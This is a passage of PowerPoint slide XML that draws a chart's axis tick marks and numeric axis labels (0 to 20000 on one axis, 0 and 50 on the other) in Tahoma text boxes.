            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="5689672"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037579" y="5605420"/>
            <a:ext cx="129610" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="5023633"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="5023633"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812499" y="4938298"/>
            <a:ext cx="353596" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="4357939"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="4357939"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="4271762"/>
            <a:ext cx="429097" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="3691943"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="3691943"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="3604684"/>
            <a:ext cx="429097" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1500</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="3020714"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="3020714"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="2938098"/>
            <a:ext cx="429097" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="2354729"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="2354729"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="1688981"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8273298" y="1688981"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="5623478"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="1688983"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171640" y="5776474"/>
            <a:ext cx="129610" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2603499" y="5623478"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2603499" y="1688983"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526349" y="5776474"/>
            <a:ext cx="203852" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996396" y="5623478"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996396" y="1688983"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3880368" y="5776475"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
